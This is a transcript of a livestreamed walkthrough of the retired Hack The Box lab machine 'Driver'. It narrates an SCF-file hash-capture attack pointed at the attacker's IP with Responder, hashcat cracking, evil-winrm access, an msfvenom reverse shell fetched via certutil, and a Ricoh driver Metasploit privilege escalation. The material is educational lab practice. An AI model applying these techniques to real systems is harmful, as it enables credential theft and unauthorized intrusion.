Sneaky steps and shadowy ways. Welcome to the lair where the code is crafty and the hacks are always ethical. Let's dive into the shadows. Hey guys, I am back today. I'm going to be going through the driver retired machine on Hack the Box. It's part of the intro to Red Team. The intro to Red Team track. Where is it? Right here. I've already connected to the VPN, and I am ready to start with reconnaissance. So the first thing I'll do is I'll actually copy the IP address and I'll add that to my host name, and I'll just map it to driver.htb so that I don't have to remember or keep copying and pasting the IP address. Whoops. Okay, add that right here. IP address, and I'll call this driver.htb. I'll save that, and I'll see if I can ping it. I'll just send one packet, driver.htb. Okay, it looks like I can ping that. So I'll look at the first question here now. We're prompted for logon credentials when accessing the target over HTTP. What username is disclosed when looking at the HTTP response headers? Before we do that, we're going to do some reconnaissance. I'm going to start by running an nmap scan, and I'm going to do all 65,535 ports, going to scan those. And I'm going to do double versioning, or verbosity, and dash capital PN for no ping scan, just saying that we're assuming that the target is alive, and then dash capital T5 is the fastest scan type. And then we'll do dash dash open to only scan open ports, and then we'll specify the host name of driver.htb. We'll run that, and after we find out what ports are opened, then we can run another scan and to find out what services are running on the ports. We'll specify the ports that we find that were open, and we'll do a versioning scan to find out what services are available or are running on the ports, and what versions of those services are running, and also run the default scripts, like for instance, if FTP were running on one of the ports, then we can see if that is vulnerable to anonymous login, things like that. That might take a little bit of time. Shouldn't take too terribly long. Probably gonna end up taking about 2 minutes. If we want to, just for the sake of time, we can see if anything is open on port 80 just by going to http://driver.htb. Okay, this site is asking you to sign in, so it looks like there is a service running on port 80. It's asking for username and password. I'm gonna cancel that. So the first question says, we're prompted for logon credentials when accessing the target over HTTP. What username is disclosed when looking at the HTTP response headers? Okay, so we need to take a look at the HTTP response headers. Probably just do this with curl, which might be a little bit easier since we have a login form. This scan is about done, yeah. Okay. Curl HTTP ://driver. I'm not sure if this might need -I. Unauthorized. Okay. So we've got port 80, 135, 445, and 5985 open. Okay. So now what we're gonna do is I'm gonna run an additional scan, and I'm gonna specify all those ports. So 80, 135, 445, and 5985. 5985, and then we'll do -S capital VC, then -PV, -PN, and -P5, and then -O capital N driver.nmap to save that to the normal nmap output file. Okay, so we'll run that. I think I actually need to not include the -PN. Let's try that. What am I doing wrong? Oh, I think I might need to remove the -T5. No? What is the issue? Oh! I didn't actually specify a target, that's why this isn't working. Driver.htb. I only specified the output file, I didn't actually specify the target. That's why it's not working. Okay, scanning services. Forget how to show all of the headers. It is -I. That's what I thought. -I. Verbose. Oh, here we go. Okay, www-authenticate says basic realm equals MFP firmware update center. Please enter password for admin. Okay, so we know that's a valid user then. Okay, so that's the answer to question 1. Weak passwords are all too common and this target is no exception. What is the password for this target's login? Okay. Okay, so this is done. Okay, so port 80 is running HTTP. It's running a Microsoft IIS web server. We also got the answer to question 1 from the nmap output. Please enter password for admin. Okay, and then we have 135, which is Microsoft RPC, or NetBIOS. It also falls into that. 445 is most likely going to be SMB, even though this just is giving a bunch of extra info that we don't really need to know. And then we have 5985, which is most likely going to be WinRM. So this could be a point of authentication for us, as well as SMB. And obviously we have the login form for the IIS website. Okay. Alrighty. So, and this, the other thing is, let's see. So the host name is driver. You can see that here. The operating system running is Windows. Okay, so this is actually kind of important to pay attention to as well. SMB security mode, account used guest, authentication level user, challenge response supported, message signing is disabled. Dangerous but default. Okay. SMB2 security mode, message signing enabled but not required. Okay. So that is a potential attack vector as well. Okay. So we're gonna do some brute forcing to find out, see if we can find out what the password for admin is on the login form on the Microsoft IIS server that's running on port 80. Okay. Weak passwords are all too common and this target is no exception. What is the password for this target's login? So we're just gonna try, I think I'm gonna use Hydra to do this. And I think I will use Fast Track. Yeah, that's usually a good one to use. We'll specify admin -capital P for password list, user, share, wordless, fast track.txt. And then, let's see. Wait a second. Oh, I did that for pop 3. Okay. Admin, capital P, user, share, wordless, fast track, text, use Hydra to brute force. I think it's like HTTP post form, maybe. Yeah, HTTP post form. Okay, so target then might be able to just do driver.htb, then http-post form. And then let's see. http //driver.htb. Username and password. I don't think I need to specify any directory or anything. Okay. Let's see. Then let's see. Okay, and then I think I do open quote /:, Username equals username and password. I think I can just do this, and then and password equals pass. Right? Oh, whoops, no. Carrot and password pass carrot. And then invalid credentials is the error. So I think colon, yeah. Oops. Invalid credentials, close that off. And dash capital V for verbosity. I think that should work. Hopefully, give it a shot. Target is using HTTP auth, not a web form. Received HTTP error code 401. Use module HTTP-get instead. What? Whoops. Didn't mean to go to a different desktop. Oh, let's see. The target is using HTTP auth, not a web form. Received HTTP error code 401. Might have to do this with Burp Suite. And sudo systemctl stop. Okay, so Burp Suite. Can I do this with just HTTP-get? But wouldn't this would be a post request? Let's see if that does anything. Unknown return code exit. Optional parameters must have the format x equals value. Is it because this needs to be needs to match? Yeah, I don't think Hydra's gonna be the thing to use for this. Did not open up Burp Suite. Let's see. Burp Suite gonna open? Where is it though? My burp slate isn't open. Jeez, what is going on? It doesn't seem like it's running. Can't get burp sleep now. Guess I could just try to do this the old-fashioned way. Oh, well that was easy. Okay, I guess I didn't even need to use Hydra or Burp Suite. Just logged in with admin admin. Okay. There are several kinds of files that are commonly dropped into a file share to target other users who may browse to the share. If the user browses to the share, their host will try to authenticate to the attacker. What is the file extension that can be uploaded here to trigger that connection? Would that be a LNK file? No? MFP Firmware Update Center. We as a part of Center of Excellence conducts various tests on multifunctional printers such as testing firmware updates, drivers, etc. Firmware updates. Drivers, updates. Okay, that doesn't seem to be functional. There are several kinds of files that are commonly dropped into a file share to target other users who may browse to the share. If the user browses to the share, their host will try to authenticate to the attacker. What is the file extension that can be uploaded here to trigger that connection? That wouldn't be RDP, but I don't think so. It's 3 characters. And it's not LNK. What would that be? There are several kinds of files that are commonly dropped into a file share to target other users who may browse to the share. If the user browses to the share, their host will try to authenticate to the attacker. What is the file extension that can be uploaded here to trigger that connection? exe? Probably not. I think I need a hint for this. Let's see. If we Google search for something like SMB share upload file attack, we can read about an interesting file type to use. We're looking for the Windows shell command files. Oh, is it .ps1 or CMD? Is it CMD? No? Is it PS1? PS1. No? Okay. Let me Google that then. SMB share upload file attack. Miter attack to see if that says anything. What kind of file type? .ps. No. What would that be? I don't think it would be txt. Stupid Microsoft support, I always have to go back twice for some reason. Maybe this. What kind of file is that gonna be? There are several kinds of files that are commonly dropped into a file share to target other users who may browse to the share. If the user browses to the share, their host will try to authenticate to the attacker. What is this file extension that can be uploaded here to trigger that connection? What kind of file would that be? Windows shell command files. Windows shell command files extension. Oh, is it bat? No, it's not bat? Huh. It's not exe. So what would it be? It's not PS1. Not BAT or CMD. I think it would be CMD. I don't think... Is it .bat? Or .cmd? I don't think so. No. Oh, jeez. If we Google search for something like SMB share upload file attack, we can read about an interesting file type to use. We're looking for the Windows shell command files. It's not BAT or CMD, and it's not PS1, so what on earth would it be? All Windows command shell file extensions. List. CPL com maybe? No? CPL? Net? I don't know. Bin? Jeez. Maybe it's in here somewhere.
Hell yeah! Goblin life! Ah!
ELJ, that's me, followed your channel.
Hey, thanks for the follow, ELJ, that's me. Welcome in. I did search for that earlier and I didn't really see anything useful in Google. I did try LNK. Oh, maybe MSI? I've tried a lot of different extension types. Or a different, file extensions. Job, LNK, tried that. MSI, MSP, SCT, VBS. VBS. WSF, Windows script file? WSF. No? WSH? Windows document shortcut, SHB, screensaver executable, SCR. I think I did SCT. I did PS1. Portable application installer file, registry script, registry data file, RGS. Did PS1. JavaScript encoded file. Windows task scheduler job file. Job. SCF file is what I'm reading about. SCF. SCF. That's not even in this article. Oh, let me go back to that search. Okay, damn it. Let me go back. SMB share upload file attack. I didn't see anything in here. I didn't see anything in here or here. Maybe in here? SMB share file upload attack. Maybe the order matters. Maybe this. So the answer is SCF. Where did you find that, though? What even is that? Is that even in this article? No? Jeez, I don't even know. Where did you find that? SMB share file upload attack. A SMB share upload file attack involves an attacker uploading a malicious file to a network share which can then be used to exploit vulnerabilities or gain unauthorized access. One common method involves using SCF shell command files to access a specific UNC path, allowing the attacker to capture password hashes or execute malicious payloads when a user browses the share. Where did you find that, ELJ? SMB share file upload attack. I'm not even getting a result for SMB share file upload attack. Maybe if I put it in quotes? Jeez, I don't know why this Google search sucks so much. Kind of cheated with AI, but then I was reading forums on SCF. Oh, gotcha. Yeah, the Google search is crap for this. I'm not seeing how we came to that conclusion, or how you would come to that conclusion by just Googling it. Oh, here we go. Finally, on page 2. SMB share SCF file attacks. Penetration testing lab, offensive techniques and methodologies. Gathering hashes. It is not new that SCF shell command files can be used to perform a limited set of operations such as showing the Windows desktop or opening a Windows Explorer. However, a SCF file can be used to access a specific UNC path, which allows the penetration tester to build an attack. The code below can be placed inside a text file, which then needs to be planted into a network share. Okay, shell command equals 2, icon file equals attacker IP address, and then share name, and then a .ico file. Okay, taskbar command equals toggle desktop. Saving the pentest lab.txt file as SCF file will make the file be executed when the user browses the file. Adding the @ symbol in front of the file name will place the pentest lab.scf on the top of the share drive. Okay, yeah, I've done this before. Responder needs to be executed with the following parameters to capture the hashes of the users that will browse the share. Responder-wrf-lm-v-I eth0. Okay. When the user browses the share, a connection will be established automatically from his system to the UNC path that is contained inside the SCF file. Windows will try to authenticate to that share with the username and the password of the user. During that authentication process, a random 8-byte challenge key is sent from the server to the client, and the hashed NTLM landman password is encrypted again with his challenge key. Responder will capture the NTLM v2 hash. Oh jeez. How do I do this? There we go. Okay. Okay, so we're gonna be setting up an attack that will capture the NTLMv2 hash of whatever user browses to our UNC path with this file. Okay. Let's see. Alternatively to Responder, Metasploit Framework has a module which can be used to capture challenge response, password hashes from SMB clients, auxiliary server capture SMB. We're just gonna use Responder to do this. Okay. So we've intercepted a... Okay, so we have to perform this attack before we answer the next question. Okay. So what I'm going to do is I'm going to create this file. Wait. I guess they just started it out as a text file. Okay, I'm just gonna make a SCF file. Nano, I just call it juicy.scf. Okay, so shell, and then command equals 2, icon file equals / my IP address of my VPN tunnel, and then / juicy.ico, and then taskbar, and then command equals toggle desktop. Okay, so I'll save that. So I have the juicy.scf file. And I want to, let's see, move juicy.scf to @juicy.scf. Hopefully that works. I'm doing this on Linux, I'm not doing it on Windows, so hopefully it will still work the same. Okay, so now I'm gonna set up responder. Sudo responder -wrf -lm -v capital I ton 0, and then I'll enter my sudo password. Oh, there's no such option as R anymore, of course. WF, let's try that. No? No such option F. Okay, so let's just try W then. Okay, so that's listening for events now. Now I'm going to serve this. I guess I can just choose anything here and then browse to my file. And hopefully this works. Submit. Oh, yep, that definitely worked. Nice. Okay. I don't think we're gonna catch anything else here. So I can probably just stop this. Okay. We've intercepted a net NTLM v2 hash with responder. What is the mode in hashcat required to crack this hash format? I forget. Hashcat, tag H, grep, NTLM v2. NTLM net NTLM v2. Let's see. Oh, I was trying to give you a sec, LOL. You were deep in the Google search. Nice. Damn, what is the mode for cracking an NTLMV2 hash? With hashcat, I forget. Grep NTLM? There we go. Is it? No, wait. I think it's 5600. No, not 600. Aha, it is. Sweet. It looks like we're gonna have an ad here in a few seconds, so I'll hold off cracking this hash until after the ad. I think we're gonna take a quick break. That way you can get some water, go to the restroom if you need to, that type of thing. And then we'll be back after the ad. Alright, I believe we're back. Okay. So, before the ad break, I was able to capture the NTLMv2 hash for the user Tony, and now I'm going to use hashcat to try to crack that. So I'll copy that and I'll just add that into a file called hash.text. Go ahead and cat that. I think that should be good. I don't think there are any spaces or anything in there, so I think that should be fine. Okay, so now I'll do hashcat, TAC-M, 5600. I'll specify my file of hash.text, and I'll specify a word list of rockq.txt. See if we can crack that. Actually I did want to do dash capital O for optimize as well. Okay. So we'll give that a shot, see if we can crack that. And I think we should be able to use evil WinRM to authenticate to the target as this user once we are able to discover what their password is. Okay. Alright, so we cracked it. Okay, so their password is Lil Tony. Okay, so now let's hop over to the exploitation tab, and I'll just use netexec real quick. Well, actually I want to do winrm, and I'll do the target of driver.htb, and I'll specify a user of Tony with a password of Lil Tony. Let's see if we can authenticate to winrm as this user. And yes, we can. They've been pwned. Alright, so we'll do evil winrm -I driver.hdb tacu Tony and a password of Lil Tony. That should authenticate us via winrm. Okay, there we go. And now the next question is submit the flag located on the Tony user's desktop. So we will cd to /users Tony desktop and ls and type. We might actually be able to do cat since we're in PowerShell. Yep, we can. Okay, so there's our user flag. Paste, submit. What is the file name that stores? Okay, so this was say easy. What's my main OS? So I on the desktop that I'm using for streaming, I'm running Windows 11. For my personal laptop, I run Kubuntu, which is essentially the KDE version. Basically an Ubuntu Linux machine with running with KDE, but it's its own operating system, and it's called Kubuntu. But it's essentially very similar to Ubuntu. It just has KDE for the desktop manager instead of GNOME. But it's a really good daily driver. It's been a week or two since since I wiped Windows 11 off my personal laptop and put on Kubuntu. Um, Windows 11 was just being really crappy on my personal laptop. It was being really slow and buggy, and so I was like, let's go ahead and wipe it and install Linux on it. And so I put Kubuntu on it, and I really like it for a daily driver. Anyway, what is the file name that stores the command history for PowerShell for Tony? What is it called? It's always the same. Yeah, I've been thinking of stepping off Windows. Yeah, not a bad idea. I've noticed it has been... I haven't had a huge amount of issues with Windows in the past, but I've had more issues with Windows 11 than probably any other Windows version, so... yeah, it's working okay. It's not bad on my desktop. It's a little bit more powerful than my laptop, but I just found that Windows 11 was not running great on my laptop, so I decided to install Kubuntu on it, and I really like it. What is the file name that stores the command history for PowerShell for Tony? I forget what that is. I wonder if I could even try to figure that out on my own, or if I need to Google that. Is it like program data? I can't remember where it is. Microsoft. I might probably just have to Google it. Or no, wait, is it C:\\. Oh, I forgot what it is. Oh, it's in there. It's in your user profile, I think, actually, now that I think about it. So let me go back into Tony. It's a hidden folder, though. Where is PowerShell history stored? Oh yeah, it's in app data. CD app data local. No, wait. So the file is called console host _ history.txt. I think that's what they're running. Yes. Okay. So now to read that file, it's this. Let's see, do I just cat the environment variable? I can't remember. Yes, okay. I think so. It didn't give me a password or anything, though. That's normally why you look at the PowerShell history file. Looking at the PowerShell history, we can see some actions being performed with a specific printer type. Research of this should show that it's exploitable for privilege escalation, and a module is available for the Metasploit framework. What is the module name? Ah, okay. Let me go ahead and split this top to bottom. I'm going to be using the Metasploit console. MSF console dash Q for quiet, because I don't want the banner and all that stuff. Okay. Yeah, if you want a really nice daily driver and you've kind of used Ubuntu before, I would definitely recommend Kubuntu. It's a really nice operating system in my opinion. It's kind of similar to Windows. It's like Windows but Linux. The same could probably be said for like Linux Mint. Let's see. Can I just search Rico underscore PCL6? Nothing. Let me try. Let me just try Rico. Okay, so we've got 2. Okay, here we go. Rico driver privilege escalation right here. So that is going, we'll say use 1. Options. Why does this fill in a default IP address? That's kind of weird. Oh, wait a second. Wait, you have to have a session established already? This has to be the right module, there are only 2. And this is for FTP, this is FTP user command buffer overflow. And this is Rico driver privilege escalation, so that's definitely going to be the correct one. But this looks like you have to have a session established already in order to run this. Maybe that's not the case. Okay, we do have a payload though, so maybe... Oh, okay, so... You can probably already have a session established to use this to escalate your privileges, or you can do this with initial access, and you can run the payload and do it that way. I think that's what it looks like to me anyway. So we'll set the L host to 10.0. I'll just leave the default listening port of quad 4. Exit front process. Wait, this doesn't... No, I think you actually do have to already have a session established. Which we do. Okay, so what we can do then is we can do, let's do, search, SMB, there's gonna be a lot for that. Let's see, what can we do here? Search, I could use like psexec to get a shell first and then escalate my privileges with that module, I think. Let's give that a shot. So use 0. Options. Set the R host. I'm gonna use the IP address. Let's see. Yeah, I have used it in some labs before. Okay, yeah. You might like Kubuntu then. Like if you're familiar with Windows and you like kind of how Windows operates, I would say that Kubuntu would be good. If you just want to use Linux though, and you're kind of a beginner, then I would just use Ubuntu. It's up to you though. I really like Kubuntu for a daily driver, as I said earlier. Let's see. Okay, so we've got our R host. I need a SMB user and SMB pass. Set SMB user Tony. Set SMB pass Lil Tony. Take a look at that. Then I need to set the L host, and I'll set that to be my tunnel adapter, which will grab my IP address. Let's give that a shot. Exploit completed but no session was created. Exploit failed, no access. Oh crap, do I not? Let me see here. NXC SMB driver dot HTB tac U Tony tac E Lil Tony. Why not have SMB access? Oh, right. SMB signing is true for version 1, so I'm not going to be able to authenticate that. Let me think. Can I get a session? Because I have access via WinRM. But that doesn't really help me here, because I want to escalate my privileges with a Metasploit framework module. So I have to get another session. I could upload a Meterpreter shell and then escalate with that. That's probably what I should do, actually. Yeah, I'm gonna do that. Okay, so I'm gonna put this on hold. I'm just gonna exit out of this for now. I'm gonna use MSF Venom, TAC-P, Windows, x64. I actually don't know if it's x64. It probably is though. Let's see. System info. What? Access denied? Oh crap, I can't run that, can I? Okay, anyway, HP Windows shell interpreter. Crap. How to create Windows interpreter shell using MSF. Oh wait, it's right here. Go back. It's right here. Okay. Was it Venom? Oh, okay, they did this. I don't normally do this way. Okay, Windows Interpreter reverse. Oh, I could do HTTPS, I guess. I guess I'll do that. Because that's what I would do in an actual pen test. lhost. Gonna be my ton0 IP. And then lport, I'll just make that the default quad 4. And then, well actually no, I'll make that 443 like I would in an actual pen test. And then I'll do file exe, and then I'll do output to shell.exe, or you know, tool.exe. Sure, why not? Okay, so let's run that, get that outputted to a file. Good luck on the boxes. I'll be coming back from time to time. Alright, sounds good, LJ. Or ELJ. Okay, so we have our execute now. Next thing I'm gonna do is I'm going to, well, let's see, I want to serve this first. I'm gonna serve this on a simple HTTP server. I'm gonna go back to, I'll just go back to this user's desktop. Actually, no, I'll put this in C Windows 10. Yeah. Okay, I don't know if there's oh wait, no, I'll just use, oh, what do you call it? Certutil. Certutil -f -url cache http:// my IP. Can't remember if this actually needs to be in double quotes or not, but we'll give it a shot. Tool.exe, tool.exe. Did that work? No, I got an error. The string is missing the terminator. Oh shit, I did not finish this. Sweet. Okay, so we should have that. Okay, sweet. Yep. Now I'll go ahead and kill this. And I'll start up MSN console again. Okay, and now I will use multi-handler options, and I want to set the payload to be the same as the malicious file that I created. So let's see, Windows interpreter reverse underscore HTTPS. Good to go on that. Need to set the L host to be my ton 0, and then I'll set L port to be 443, and I think that should be everything I need. I don't have to set that. Okay, so let me go ahead and run that then to set up my handler. Maybe. Okay, started HTTPS reverse handler. And then I want to execute my malicious file or malware, and hopefully I should get a callback. Maybe I shouldn't have done. Let's see. Awesome. Okay. So I did get a Meterpreter shell then. Okay, so we have a Meterpreter session now. So now if I do, let's see, BG, I can background this, and then I can search for Rico again. And I actually accidentally forgot to put this in here. This is going to be the answer to that. It's actually just going to be this. Okay, so now that we have a session established, we can say use one. And then options. Set the L host to be ton 0. Set the L port to be 443 maybe. And then the last thing we need to do, I don't think, I'm not actually sure if this stuff is necessary down here, because all I really care about is the session. So set session, we'll actually do sessions tag L to list the current sessions. Okay, so then I'll do set sessions 1. Unknown data store options sessions. Did you mean session? Session. Oh, okay. I guess it's just session 1. Okay. And then I'll try to run that. Deleting printer. Exploit completed but no session was created. Oh crap. Deleting printer? That doesn't sound good. Huh. Hey, welcome in, GoPro. Haven't seen you in a while. If you want to do the hack the planet thing, you can do !hackers, GoPro. That's the way I have it set on my channel. I think that there's an ad at the moment though, so we will be right back. Okay, I think we're back. My notifications for ads don't seem to be working very well. I think I know why this isn't working. I think I need to set different parameters for the listener, for this. I don't think it can be the same as what it was before. Set L port. I'll just set this to quad 4 like it normally is, for the default. I don't know why you have to set the payload. Let's just try running that though and see if that works. Exploit aborted due to failure, bad config. The payload should use the same architecture as the target driver. Let me see. Set. Let's see. Set payload default. Set payload. Is that the default? It must be the default. Search payload. I would think you would just need the session for this, because I already have a session established. I don't know why I need a payload. Show targets. There's just Windows. Okay. Why will this not work? Exploit aborted due to failure, bad config. The payload should use the same architecture as the target driver. Search payload driver. Oh, okay. I should probably read this. Initial attempts to exploit this vulnerability may fail under specific logon types, such as non-interactive, but in this scenario we can switch to an interactive logon. What command can be used in Metasploit to switch to an interactive logon process? Is that... isn't it... Oh, I forget.
Hell yeah! Cable Life! Ah!
Tachanka_ the Savior followed your channel.
Thank you for the follow, Tachanka. Migrate? Is it migrate? Yes. Okay. PS. What would I migrate to? Like Elsass? See, in addition to the Rico PCL6 Universal Driver version 4.23 vulnerability, this target is also vulnerable to CVE 2021-1675, aka Print Nightmare. Is it possible to elevate to system privileges with this CVE? I believe so. Yeah, that's what I thought. Initial attempts to exploit this vulnerability may fail under specific logon types such as non-interactive. And in this scenario, we can switch to an interactive logon. What command can be used on Metasploit to switch to an interactive logon process? Okay, so this is the process that I'm running as right now. Tool.exe. So what process would I want to migrate to? I don't think I can migrate to Elsass. Maybe Explorer? 31.112? Whoops. Yeah, 31.112. I mean, I can migrate to SVC host. Interactive logon process. Interactive login is accessing a remote system through a terminal. Okay. Would that be like... Oh, I do have WSM Pro vhost.exe. Maybe I should migrate to that. Migrating from 4692 to 2280. See if that works. Can I migrate to that process? Aha, migration completed successfully. Which means that I'm also that I've injected into this WinRM process, I believe. Let's see. So, wonder if I can run the. Wonder if I can run this now. The payload should use the same architecture as the target driver. Okay, let me try using Print Nightmare instead. Use 0. Set lhost to 10.0. set our hosts. Set that to the IP. And then what else do I need to do? Okay, so I've set our host. Set SRV host 0 oh wait, I can set this to localhost. I'll just do that. Let's see. That's already set. Process 10.3. Let me try running that, I guess. Exploit aborted due to failure. Unknown cannot reliably check exploitability. Failed to authenticate through the remote service. Set force exploit true to override check result. Exploit completed with no session was created. I really would like to know how to exploit that other... How do I exploit that other vulnerability? The recode vulnerability. Okay, so they did the same thing. Okay, so yeah, they used MSF Venom to create a Meterpreter shell. And then they got the Meterpreter shell. Okay, and they did use Evil WinRM as well. They executed the shell. They got the Meterpreter session, and then enumeration of the processes that are currently running on the system. We can see that we are on session 0, meaning that the Meterpreter process is running on a non-interactive isolated services session. Oh, okay. So that... okay. So if I go back up here... does it actually... maybe I just can't see it because it's... oh, okay. So Explorer.exe does have a session. That's what I thought. Okay, so that's an interactive session. My Meterpreter session, though, did not have an interactive logon. So it could be any of these. I could have migrated to any of these. The one that I think okay, so yeah, I migrated into Explorer.exe, so there is definitely an interactive logon session on there. Okay. Okay, and they migrated to Explorer too, it looks like. Now that we have a valid interactive Meterpreter session, we can execute the local exploit suggester module and review the output. To use the module in our current session, we use the following commands. Wait a second. Okay. Let me see. Sessions 1. Okay, so I'm in my Meterpreter session, and then I do use multi recon local exploit suggester. Failed to load extension. No module to name multi-recon local exploit suggestion. What? Did I spell something wrong? Multi/recon. Oh, I can't be in the interpreter session, that's why. Got it. Okay, so I background this, then I do use multi-recon local exploit suggester. Okay, and then I set the session to be 1. Okay, and then then I just run that to see what what exploit I can use to escalate my privileges. And then we have a list of possible working exploits. Let's see. Can you explain to me what you are doing right now, because I just joined in? Yeah, so my initial access vector was finding out, so capturing the NTLMv2 hash of the user Tony, and then I was able to crack their password hash and use evil WinRM to authenticate. Okay, so that was my initial access vector. And then now what I'm trying to do is I'm trying to escalate my privileges to system. And the way that I'm doing that is I used a tool called MSF Venom, which is part of the Metasploit framework, to create a malicious executable, which got me a reverse interpreter shell, which is the interactive shell for the Metasploit framework. I got a interpreter shell by using the multi-handler, and then I executed my interpreter shell via evil WinRM and got a interpreter session, and now what I'm trying to figure out how to do is escalate my privileges by using the local exploit suggester from the Metasploit framework. Okay, so and now I've run that against my current session, and so now I can see what all the target is vulnerable to. So now, and I'm also using the write-up to finish this out, because I kind of got stuck. We have a list of possible working exploits. Given that the main website was mentioning printer software, we are more interested in the exploits that relate to printer exploitation. Another hint can be discovered by reading the PowerShell history line, which we did, and we found out that we have this Rico PCL6 Universal Driver version 4.23. The target is well, there's a driver that is on the target that is vulnerable to privilege escalation. And we found out that there is a Metasploit module for that particular vulnerability, and so now we're trying to leverage that. Hopefully that makes sense, because I've kind of gotten a fair bit through this, so there is quite a bit that I've already done, but that's kind of the gist of what I've done. You can watch the VOD back if you need to better understand what I did. The PowerShell history reveals that a command to add a printer was issued. We can also see the driver's name is Rico PCL6, Universal Driver version 4.23. Looking at our list of possible exploits, we find an exploit module called Rico Driver Privesc. The closed connection of the exploit's name and the installed driver sounds very promising, so we decided to proceed with this exploit. We use the following commands to execute the exploit on the remote machine through our meterpreter session. So use exploit Windows local Rico driver privesc, and then we set the payload to Windows x64 meterpreter reverse TCP, set the session, set the listening host to our 10.0 adapter, and then we run the exploit. Does it actually show up here? Oh, yep, here it is. Exploit Windows local Rico driver privesc. That's 15, so we'll say use 15. Invalid module index 15. What? Okay, in that case I'll just do exploit Windows local Rico underscore driver underscore privesc. And I want to set the payload to be, actually no, that's good. I'll set the session to 1, and I'll set all host to 10.0. I did try to run this before and it didn't work, but maybe it will work this time for some reason. I don't know. No, that's what I thought. Exploit aborted due to failure. Bad config. The payload should use the same architecture as the target driver. Oh wait, so I think the problem is that I need to set the payload to be Windows x64 meterpreter reverse underscore TCP. It's probably using the default x86 payload, so I actually have to specify it to be x64. Okay, so then let's try running that, and hopefully it will work this time. Seems to be working. Fingers crossed. Come on. Come on. Once this hopefully works, I will have I should have a session as system, and then I should be able to get the last flag on the administrator's desktop. This is taking quite a bit of time though. Come on. I'm wondering if I maybe should not have migrated to my WinRM session. Probably should have just migrated to explorer.exe. The exploit's executed successfully, and we have a shell as NT authority system. It has not finished the exploit for me. Oh crap, I just realized that I have these windows on the wrong sides again. You guys probably can't see what the heck I'm doing. Gosh damn it. I wonder if I can just hit... I don't think the exploit is completed though, so yeah, I don't think hitting enter is gonna do anything. Crap. I wonder if I could migrate to a different process at this point. Can I migrate to explorer.exe? Migrate 2456. Ah, okay, so background this, run this. Let's try this again. I hope this works this time. There's actually an ad going on, isn't there? What? Crap, that did not work. Come on. Crap. Now this isn't working at all. Explorer should have an interactive logon session. Send timed out. Timeout currently 15 seconds. You can configure this with sessions -- interact ID -- timeout value. I wonder if I need to just create open this session up again. Seems like I might have screwed it up. Use multi-handler options. Okay, I think everything should be good. We run this. Probably shouldn't have done a HTTPS reverse handler. Or an HTTPS reverse interpreter shell. Okay, so that's started. So now all I have to do is /tool.exe. Should give me my interpreter session. It did. Okay. Currently. Wait, what? Tool.exe. And this is exe.
Hell yeah! Goblin life! Ah!
ATKDRACO23 followed your channel.
Hey, thank you for the follow. Let's see. Okay, so this is tool.exe. Oh, I wonder if... This is x86. Okay, migrate to 4768. What? Can't migrate to that. Let me try migrating to OneDrive. Migrate to 4332. It has an interactive logon session. Oh, there was another Explorer. I just realized. This doesn't work, then I'll migrate to that. Could also migrate. Nope, I can't migrate to conhost. Error running command migrate. No responses received to the core_load lib request. Okay. Let me try to migrate to that second Explorer process. Well, running command migrate undefined method PID for nil : nil class. Oh, what other processes with an interactive logon can I migrate to? Send timed out. Timeout currently 15 seconds. You can configure this with sessions -- interact ID -- timeout value. Why am I getting so many timeout errors in this session, I wonder? Can I even get a shell? No, everything is timing out. Sessions dash interact 1 dash timeout 60. Invalid session identifier 1. What? Oh, this is session 2, that's why. Okay, this doesn't seem to be working. This is what I'm gonna do. I'm gonna delete tool.exe. I'm gonna exit out of this. Go back to MSF Venom. Instead of doing reverse underscore HTTPS, I'm just gonna do reverse underscore TCP. Oh crap, actually, I want to make this x64 as well. x64. Okay, set up my Python web server again, and then cert util-f-url cache p:// my ton0 IP, and then tool.exe, tool.exe. Okay, and that worked. There's tool.exe right there. Get rid of this, then I'll go to MSF console-q. Set up my multi-handler. Okay, use multi-handler. Whoops. Multi-handler. Set payload Windows x64 interpreter reverse underscore TCP and options set lhost to ton0 set lport. Oh crap, is lport 443 still, I think? Yes, okay. Need to make sure I set that correctly. And I should be able to run that. Okay, then I'm going to run this. Okay, I have my interpreter session. I'm currently running as full.exe, so I'm running on PID 3312. I need to migrate to a process that has an interactive logon, and Explorer.exe does have an interactive logon because it has a 1. I have a 0, so I don't have an interactive logon, but I need an interactive logon to escalate my privileges, so I need a process that has a 1 for session. Okay. So then I will do migrate, and I want to migrate to Explorer.exe. And that worked. Okay. So now I'm going to background that, and then I need to search for Rico, and I'm going to use 1. I want the Rico driver privilege escalation, and I need to set my payload to be the same. Windows x64 interpreter _TCP, and I need to set lhost to be 10.0. Options, and I think everything else should be good. Okay, so let me try running this now. What? Oh, and then I have to set this session. And my session, I believe, is... Okay, it's 1. So I need to do set session 1. And then I can run this. And hopefully this will work this time. Awesome. And it did. So now if I do get UID, I should be NT Authority system. And I am. Awesome. Okay, so I've successfully escalated my privileges to system. So now I can just do shell, and I'll cd into c:\users administrator desktop and get the root flag. I have to do dir and type root.txt. And there's the root flag. Finally. I was just being too fancy. I needed to not use a reverse HTTPS shell. Reverse HTTPS interpreter shell. Okay, so I'll submit that. Hey, driver has been pwned.
I'm such a bad hacker! Bad. Game over!
Intruder destroyed.
Okay. Just because of that rigmarole, I'm gonna say not too easy. Awesome! Another machine pwned. That was a fun one. Let's see. Do I want to raid anyone? Is there anyone to raid? Yeah, actually probably won't raid anyone. Alright, well, I think I'm gonna end this stream there. Hopefully you guys enjoyed the content. Hopefully you learned something. I definitely learned a lot. I do it every time. This was kind of a fun one. Probably do a Linux retired machine that's part of the Intro to Red Team track next time. I will probably stream, yeah, next Thursday again. So hopefully I will see you guys next time. Thanks.